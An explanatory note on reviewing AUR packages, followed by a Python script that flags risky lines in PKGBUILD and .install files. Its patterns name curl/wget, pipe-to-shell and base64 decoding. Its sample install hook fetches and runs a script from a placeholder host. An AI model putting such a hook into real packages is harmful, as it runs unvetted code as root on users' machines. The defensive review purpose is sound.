AUR packages are maintained by members of the community. If a malicious member of the community wanted to inject code into an AUR package, they could. The same is true of any community-maintained repo on any distro. However, AUR has an advantage in that you have the ability to see exactly what the package is going to do because all the instructions are contained in the PKGBUILD and the package.install file.
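As an added illustration (not part of the original text), the Python sketch below shows one way to support that review: it lists the lines of a PKGBUILD and its .install file that deserve a careful read before building. The pattern list, the `review` function and the sample package `demo-tool` are assumptions constructed for this example; it is a reading aid that works line by line, not a malware detector.

```python
import re

# Patterns worth a manual look before running makepkg (illustrative, not exhaustive).
CHECKS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads outside the source=() array"),
    (re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b"), "pipes data into a shell"),
    (re.compile(r"\b(base64\s+(-d|--decode)|eval)\b"), "decodes or evaluates hidden text"),
    (re.compile(r"^\s*(pre|post)_(install|upgrade|remove)\s*\(\)"), "scriptlet hook, run by pacman as root"),
    (re.compile(r"sums(_\w+)?=.*\bSKIP\b"), "source integrity check skipped"),
    (re.compile(r"^\s*source(_\w+)?=.*\bhttp://"), "source fetched over plain HTTP"),
]

# Constructed sample files for a hypothetical package; example.invalid never resolves.
SAMPLE_PKGBUILD = """\
pkgname=demo-tool
pkgver=1.0
source=("http://example.invalid/demo-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
install=demo-tool.install
build() {
  make
}
package() {
  make DESTDIR="$pkgdir" install
}
"""
SAMPLE_INSTALL = """\
post_install() {
  curl -s https://example.invalid/setup.sh | sh
}
"""

def review(files):
    """files maps filename -> text; returns [(filename, line_no, reason, line)]."""
    findings = []
    for name, text in files.items():
        for no, line in enumerate(text.splitlines(), 1):
            if line.lstrip().startswith("#"):  # skip comment lines
                continue
            for pattern, reason in CHECKS:
                if pattern.search(line):
                    findings.append((name, no, reason, line.strip()))
    return findings

if __name__ == "__main__":
    files = {"PKGBUILD": SAMPLE_PKGBUILD, "demo-tool.install": SAMPLE_INSTALL}
    for name, no, reason, line in review(files):
        print(f"{name}:{no}: {reason}: {line}")
```

A clean result only means none of these patterns appeared; the files still need to be read in full, since checksum arrays split across several lines or commands hidden in variables are not caught by a line-by-line match.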